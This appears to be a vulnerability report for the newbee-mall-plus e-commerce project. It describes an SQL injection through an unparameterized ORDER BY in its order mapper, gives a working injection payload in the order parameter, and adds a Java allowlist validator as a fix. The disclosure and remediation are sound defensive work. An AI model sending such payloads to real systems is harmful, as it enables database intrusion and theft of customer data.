Open
Description
SQL injection exists in newbee mall. On the order page, `<if test="sortField != null and order != null"> order by ${sortField} ${order}` is not precompiled, allowing logged-in user attackers to steal sensitive information such as databases by constructing malicious sql statements.
newbee-mall-plus-main\src\main\resources\mapper\NewBeeMallOrderMapper.xml

Payload: _search=false&nd=1693539277711&limit=20&page=111&sidx=createTime&order=desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))&totalrows=
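The root cause is that `${sortField}` and `${order}` are spliced into the statement verbatim. A fix that keeps the dynamic ORDER BY is to restrict both values to fixed allowlists before they reach the mapper. The class below is an added illustration, not newbee-mall's own code; it assumes the controller maps the request's `sidx`/`order` parameters onto `sortField`/`order`, and the column names in the allowlist are assumed for the example.

```java
import java.util.Locale;
import java.util.Set;

// Added illustration (not newbee-mall's own code): validate the two ORDER BY
// inputs against fixed allowlists before they reach a MyBatis ${} substitution.
// The column names below are assumed for the example, not taken from the project.
public final class OrderSortValidator {

    // Only real column names of the order table may be interpolated.
    private static final Set<String> ALLOWED_SORT_FIELDS =
            Set.of("createTime", "orderId", "totalPrice", "orderStatus");

    // Direction is limited to the two SQL keywords, compared case-insensitively.
    private static final Set<String> ALLOWED_ORDERS = Set.of("asc", "desc");

    private OrderSortValidator() {}

    /**
     * Returns the validated (sortField, order) pair or throws if either value is
     * not on its allowlist. Because the returned strings are always one of the
     * fixed literals above, "order by ${sortField} ${order}" in the mapper can
     * no longer receive attacker-controlled SQL.
     */
    public static String[] validate(String sortField, String order) {
        if (sortField == null || !ALLOWED_SORT_FIELDS.contains(sortField)) {
            throw new IllegalArgumentException("invalid sortField");
        }
        String direction = order == null ? null : order.toLowerCase(Locale.ROOT);
        if (direction == null || !ALLOWED_ORDERS.contains(direction)) {
            throw new IllegalArgumentException("invalid order");
        }
        return new String[] {sortField, direction};
    }

    public static void main(String[] args) {
        // Benign values from the reported request: sidx=createTime&order=desc
        String[] ok = validate("createTime", "desc");
        System.out.println("accepted: order by " + ok[0] + " " + ok[1]);

        // The reported payload appends a subquery after "desc"; the whole value
        // is rejected instead of being concatenated into the statement.
        String injected = "desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*"
                + "(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))";
        try {
            validate("createTime", injected);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Any value not on the allowlist, including the `,(SELECT ...)` suffix from the report, never reaches the `${}` substitution, so the mapper fragment itself does not need to change.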
